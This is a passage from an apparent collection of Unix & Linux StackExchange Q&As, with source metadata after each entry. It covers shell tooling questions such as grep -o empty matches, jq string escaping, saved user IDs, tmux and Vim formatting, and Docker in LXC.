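size=$(stat -c %s -- "$filepath")    # GNU stat; BSD/macOS uses: stat -f %z
if [ "$size" -gt 1000000 ]; then
    printf '%s is larger than 1 MB\n' "$filepath"
fi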
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/548753", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/379007/" ] }
548,866
I found an answer on another site that was suggesting grep -oP '^\w+|$' . I pointed out that the |$ is pointless in PCRE, since it just means "OR end of line" and will therefore always be true for regular lines. However, I can't exactly figure out what it does in GNU grep PCREs when combined with -o . Consider the following:

$ printf 'ab\na\nc\n\n' | perl -ne 'print if /ab|$/'
ab
a
c

$

(I am including the second prompt ( $ ) character to show that the empty line is included in the results). As expected, in Perl, that will match every line. Either because it contains an ab or because the $ matches the end of the line. GNU grep behaves the same way without the -o flag:

$ printf 'ab\na\nc\n\n' | grep -P 'ab|$'
ab
a
c

$

However, -o changes the behavior:

$ printf 'ab\na\nc\n\n' | grep -oP 'ab|$'
ab
$

This is the same as simply grepping for ab . The second part, the "OR end of line", seems to be ignored. It does work as expected without the -o flag. What's going on? Does -o ignore 0-length matches? Is that a bug or is it expected?
My GNU grep man page says the following:

-o, --only-matching
       Print only the matched (non-empty) parts of a matching line, with each such part on a separate output line.

(Emphasis on "non-empty" is mine.) I'm guessing it considers the end-of-line match to be an "empty match".
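A quick way to see both behaviours side by side, using the printf input from the question:

$ printf 'ab\na\nc\n\n' | grep -cP 'ab|$'
4
$ printf 'ab\na\nc\n\n' | grep -oP 'ab|$' | wc -l
1

With -c all four lines count as matching, because the empty match at end of line is enough to select a line; with -o only the single non-empty ab match is actually printed.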
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/548866", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/22222/" ] }
548,892
I am trying to come up with a tool for sending data up to a GitHub gist via the API. The problem is the GitHub API takes the gist content as a single line with all escape sequences written out literally, like so:

{
  "test.txt": {
    "filename": "test.txt",
    "type": "text/plain",
    "language": "Shell",
    "raw_url": "https://gist.githubusercontent.com/jessebutryn/5c8b2a95b4b016e2fa33edee294c732b/raw/474f72ad32c843c18e9a61a228a31df6b85a8da1/test.txt",
    "size": 96,
    "truncated": false,
    "content": "#!/bin/sh\n\n# comment\nfunc () {\n\tfor ((i=1;i<10;i++)); do\n\t\t:\n\tdone\n}\n\nprintf '%s\\n' Foo bar baz\n"
  }
}

That content is displayed as follows:

#!/bin/sh

# comment
func () {
	for ((i=1;i<10;i++)); do
		:
	done
}

printf '%s\n' Foo bar baz

Which needs to be converted to:

#!/bin/sh\n\n# comment\nfunc () {\n\tfor ((i=1;i<10;i++)); do\n\t\t:\n\tdone\n}\n\nprintf '%s\\n' Foo bar baz\n

Are there any tools that do this in one action? If not, does anyone know how it could be done with sed or any of the standard Unix tools?

Note: any literal escape sequences in the original text will need to be escaped to prevent GitHub from interpreting them (however, this is a secondary issue that doesn't necessarily need to be solved in this question, but would be nice to have). I.e.:

printf '%s\n' Foo bar baz

becomes:

printf '%s\\n' Foo bar baz
jq -R -s '.' < datafile

This reads in all of datafile as a string, and then has jq just print it out as a JSON string. It will give you a quoted string suitable for substituting into that template directly, with the contents of datafile in it. The data will be correctly JSON-quoted with only the RFC 7159 escapes used, and will be in one big line because JSON doesn't allow string literals to span multiple lines.

You could also assemble the whole document in jq with a template JSON file and

jq --arg f "$(cat datafile)" '.["test.txt"].content = $f' < template.json

Very recent versions of jq have a --rawfile f datafile option that you can use to load a file into a string instead of the command substitution; you could also swap things around with -R --slurp --slurpfile t template.json datafile and t["test.txt"].content = . .
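Putting it together for the gist API specifically: a sketch using the filename from the question, which still leaves out any other fields your request may need:

jq -R -s '{files: {"test.txt": {content: .}}}' < test.txt

This emits a complete JSON object with the file contents escaped onto one line, ready to merge into the body of the API call.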
{ "score": 5, "source": [ "https://unix.stackexchange.com/questions/548892", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/237982/" ] }
548,977
I have a small snippet which gives me some IPs of my current network:

#!/bin/bash
read -p "network:" network
data=$(nmap -sP $network | awk '/is up/ {print up}; {gsub (/\(|\)/,""); up = $NF}')

It returns IP addresses like this:

10.0.2.1
10.0.2.15

and so on. Now I want to make them look like this:

10.0.2.1, 10.0.2.15, ...

I'm a total bash noob, plz help me :)
If you need exactly ", " as the separator, you could use

echo "$data" | xargs | sed -e 's/ /, /g'

or, if a plain comma is enough as the separator:

echo "$data" | paste -sd, -
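If you'd rather not spawn the extra processes, bash alone can do the join; this sketch relies on word-splitting the unquoted $data, so it assumes the addresses contain no whitespace or glob characters:

out=$(printf '%s, ' $data)   # one "ip, " per address
echo "${out%, }"             # strip the trailing ", "

printf repeats its format once per address, and the parameter expansion removes the final separator.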
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/548977", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/346824/" ] }
548,985
As far as I understood, the different user IDs are as follows (from the perspective of a process):

real user ID: the user ID that owns the process
effective user ID: the user ID which determines what the process is currently allowed and not allowed to do
saved user ID: basically the original effective user ID, kept so the process can return to it when necessary

Now I have two questions:

Wouldn't saving the effective user ID in a variable at the beginning of the program make the saved user ID unnecessary?
How can I retrieve the saved user ID in a C program? I was not able to find any functions doing that.
Wouldn't saving the effective user ID in a variable at the beginning of the program make the saved user ID unnecessary?

It's not a question of what the userspace program remembers, but what rights the kernel lets it use. For the separation between users to work, it has to be the system that controls what user IDs a process can use. Otherwise any process could just ask to become root.

How can I retrieve the saved user ID in a C program? I was not able to find any functions doing that.

With standard functions you can't (there's only getuid() and geteuid() ). At least Linux has getresuid() that returns all three user IDs, though.

Anyway, usually you wouldn't need to read it. It's there to allow switching between the real user ID and the effective user ID in the case of a setuid program, so it starts as a copy of the effective user ID. In a setuid program, the real user ID is that of the user running it, and the effective and saved user IDs are those of the user owning the program. The effective user ID is the one that matters for privilege checks, so if the process wants to temporarily drop privileges, it changes the effective user ID between the real and the saved user IDs.

In what way does the kernel use the saved user ID to check whether a process can or cannot change its user ID? Does this mean that when a process tries to change its effective user ID, the kernel checks the saved user ID to make sure the process is allowed to do so?

Yes. The Linux man page for setuid() mentions this, but it's somewhat hidden:

ERRORS
       EPERM  The user is not privileged and uid does not match the real UID or saved set-user-ID of the calling process.

In other words, you can only set (the effective) user ID to one of the real or saved IDs. The man page for setreuid() is clearer on that:

Unprivileged processes may only set the effective user ID to the real user ID, the effective user ID, or the saved set-user-ID.
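Since the question asks about C, here is a minimal Linux-only sketch of the getresuid() call mentioned above (it is a GNU extension, hence the feature-test macro):

#define _GNU_SOURCE
#include <stdio.h>
#include <unistd.h>

int main(void)
{
    uid_t ruid, euid, suid;

    if (getresuid(&ruid, &euid, &suid) != 0) {
        perror("getresuid");
        return 1;
    }
    /* all three IDs are equal unless this runs setuid */
    printf("real=%ld effective=%ld saved=%ld\n",
           (long)ruid, (long)euid, (long)suid);
    return 0;
}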
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/548985", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/179766/" ] }
548,988
I have an unprivileged lxc container on an Arch host, created like this:

lxc-create -n test_arch11 -t download -- --dist archlinux --release current --arch amd64

And it doesn't run docker. What I did inside the container:

Installed docker from the Arch repos:

pacman -S docker

Tried to run a hello-world container:

docker run hello-world

Got the following error:

docker: Error response from daemon: OCI runtime create failed: container_linux.go:346: starting container process caused "process_linux.go:297: applying cgroup configuration for process caused \"mkdir /sys/fs/cgroup/cpuset/docker: permission denied\"": unknown.
ERRO[0037] error waiting for container: context canceled

What is wrong, and how can I make docker work inside the container?
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/548988", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/282984/" ] }
549,002
I need to paste two columns (in a file) to a very big file with an identical number of columns (length 48554). I have two files with columns separated by tabs. File 1 looks like this:

Header_1  header_2
0         23
1         25

and file 2 looks like this:

Header_3  header_4
2         24
3         26

What I want is this:

Header_1  header_2  Header_3  header_4
0         23        2         24
1         25        3         26

I have tried paste, e.g. this:

paste file1 file2 | pr -t -e24

but I get this:

Header_1  header_2
0         23
1         25
Header_3  header_4
2         24
3         26

i.e., the problem is that paste appends the new columns in file 2 to the bottom of the last column in file 1, not added side by side as two extra columns in the +5000 column matrix as I need. What am I doing wrong?
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/549002", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/354164/" ] }
549,004
How can I disable these spaces between the window entries in tmux's status line?

~/.tmux.conf:

#background color
set -g status-bg colour63

#window settings
set -g window-status-current-style fg=black,bg=colour75
set -g window-status-style bg=colour68
setw -g window-status-format ' #I [#W] '
setw -g window-status-current-format ' #I [#W] '

#status lines in panel on left and right
set -g status-right '#[bg=colour75][#S]'
set -g status-left ''

#separator lines
set-option -g pane-active-border-style "bg=default"
set-option -ag pane-active-border-style "fg=colour63"
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/549004", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/379266/" ] }
549,008
I want to make a table in vim. Making a horizontal line is easy:

______________________________

For the vertical I use this:

yes "|" | head -10

But the result is bad:

|
|
|
|
|
|
|
|
|

I want something contiguous like the horizontal line. How can I do this?
If your version of Vim is compiled with multibyte support and your terminal encoding is set correctly, you may use the Unicode box-drawing characters , which include horizontal and vertical lines as well as several varieties of intersections and blocks. Vim defines some default digraphs for these characters, such as vv for │ (to enter a digraph, you use Ctrl - K ; thus in insert mode ^Kvv will insert the character │ at the cursor location). For the full list, if your version of Vim supports it, type :digraphs ; for more information on the feature and to search by Unicode character name, type :help digraphs . Depending on your terminal settings and choice of font, however, box-drawing characters may not all render as connected lines, so your mileage may vary. For instance, on my machine vertical lines render as connected in the terminal (using Source Code Pro), but as broken lines in GVim (using DejaVu Sans Mono).
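To reproduce the yes "|" | head -10 idea inside Vim itself, :put with a List result inserts one line per element; this is a sketch that assumes your font renders the box-drawing characters as connected in the first place:

:put =repeat(['│'], 10)

Each inserted line holds a single │ (the ^Kvv digraph), and with a suitable font the stacked lines draw as one continuous vertical rule.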
{ "score": 6, "source": [ "https://unix.stackexchange.com/questions/549008", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/80389/" ] }
549,012
I just bought a new HP laptop just for the purpose of installing and learning Kali Linux. It originally had Windows 10 installed on it. I downloaded and installed the latest version of Kali Linux. Everything seems to be good and working, but when I try to connect to the internet, I can't do it. I can only connect using a wired connection. For wireless connections, it says no wifi adapter found. I did not install Kali on any virtual machine; my PC is pure Kali Linux now, booted straight from the drive. When I type iwconfig in the terminal, it just shows me eth0 and lo. It doesn't show wlan0. I have been looking for a solution for a whole day now. I tried a method, "download compat-wireless", that everyone was showing, and I was able to get wlan0 and wlan1, but now the problem is it doesn't detect any wifi. Also, when I reboot my laptop, it is gone and I have to do it again; it's not saved. I have also realised that bluetooth is not working. However, the "download compat-wireless" method seems to fix the bluetooth, but it's gone at restart. There are people who said I need to get an adapter, but the laptop should have a built-in wifi card, right? And I booted directly on the machine, not in any virtual box, so do I really need to buy one? What's the point of me buying a new laptop just for Kali? Please help me.
{ "score": 6, "source": [ "https://unix.stackexchange.com/questions/549012", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/379274/" ] }